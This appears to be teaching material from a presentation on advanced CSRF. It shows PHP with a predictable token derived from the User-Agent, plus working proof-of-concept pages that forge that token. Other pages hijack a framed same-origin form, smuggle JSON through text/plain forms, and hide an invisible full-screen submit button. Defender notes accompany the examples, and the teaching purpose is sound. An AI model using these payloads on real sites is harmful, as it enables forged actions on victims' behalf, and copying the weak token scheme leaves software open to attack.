// The anti-CSRF token is the SHA-1 of the request's User-Agent header.
// That input is not a secret: any page opened in the victim's browser can read
// navigator.userAgent and derive the same hash, so a matching token does not
// show that the request originated from this site's own form.
// The usual replacement is a per-session value from random_bytes(), kept
// server-side and compared with hash_equals().
// NOTE(review): HTTP_USER_AGENT is read without an isset() check; a request
// that omits the header would hash an undefined index.
$token = sha1($_SERVER['HTTP_USER_AGENT']);
// Only the presence of a posted token is tested on this line; the body of the
// branch, where the comparison presumably happens, is outside this excerpt.
if (isset($_POST['token'])) {
// Expected token = sha1(User-Agent). The value is identical for every request
// sent by the same browser and can be recomputed by any third-party page, so
// it is predictable rather than secret.
// A CSRF token has to be unpredictable to other origins: generate it with a
// CSPRNG (random_bytes()), bind it to the session, and compare with
// hash_equals().
$token = sha1($_SERVER['HTTP_USER_AGENT']);
// Branch taken when the POST body carries a "token" field; the validation
// itself is not visible in this excerpt.
if (isset($_POST['token'])) {
<!--
  Demonstration page for a predictable anti-CSRF token.
  On load, loaded() writes CryptoJS.SHA1(navigator.userAgent) into the "token" field and
  submits frmCSRF (POST to /advanced-csrf/leaking/index.php) into the iframe named "iframe".
  This works against a server whose expected token is sha1 of the User-Agent header, because
  both sides hash a value that every web page can read.
  Defender takeaway: a token must not be derivable from request metadata. Use a random
  per-session token checked server-side, set SameSite on the session cookie, and verify the
  Origin header on state-changing requests.
-->
<html> <header> <script src="http://crypto-js.googlecode.com/svn/tags/3.1.2/build/rollups/sha1.js"></script> </header> <body onload="loaded();" > <iframe name="iframe"></iframe> <form name="frmCSRF" method="POST" action="http://localhost/advanced-csrf/leaking/index.php" target="iframe"> <input type="text" name="token" id="token" value="" /> <textarea name="msg" cols="15" rows="5">harharhar</textarea> </form> <script type="text/javascript"> function loaded() { document.getElementById('token').value = CryptoJS.SHA1(navigator.userAgent); document.frmCSRF.submit(); } </script> </body> </html>
<!--
  Demonstration: once ./vote.php has loaded in the iframe, loaded() uses jQuery to reach into
  the framed document, marks the "banana" option as selected and submits the form it finds
  there. Because the real form is submitted, any hidden CSRF token in it is sent along.
  .contents() can only read a framed document of the same origin, so this requires script
  running on the voting site's own origin (for example through an XSS flaw or hosted content).
  Defender takeaway: CSRF tokens do not protect against same-origin script. Fix script
  injection first, and keep untrusted content on a separate origin.
-->
<script type="text/javascript"> function loaded() { $("#ifr").contents().find("select option[value=banana]").attr("selected",true); $("#ifr").contents().find("form").submit(); } </script> <iframe onload="javascript:loaded()" id="ifr" src="./vote.php"></iframe>
{ "subscribe_to": "weekly_newsletter", "mail": "john@doe.com" }
<form method="POST" action="http://localhost/advanced-csrf/ex2-3/subscribe.php" enctype="text/plain"> <input type='text' name='{"subscribe_to":"weekly_newsletter","mail":"hon@doe.com", "ignore_me":"' value='"}' /> <input type="submit" value="send" /> </form>
{ 'subscribe_to': 'weekly_newsletter', 'mail': 'john@doe.com', 'ignore_me': '"}' }
<form method="POST" action="http://localhost/advanced-csrf/ex2-4/api.php" enctype="text/plain"> <input type='text' name='{"action":"reset-voting","value":"all", "ignore_me":"' value='"}' /> <input type='submit' value="submit" style="position:fixed;top:0;left:0;width:100%;height:100%;opacity:0;" /> </form>
audience.ask(questions);
This presentation is licensed under the
Creative Commons Attribution 4.0 International
license.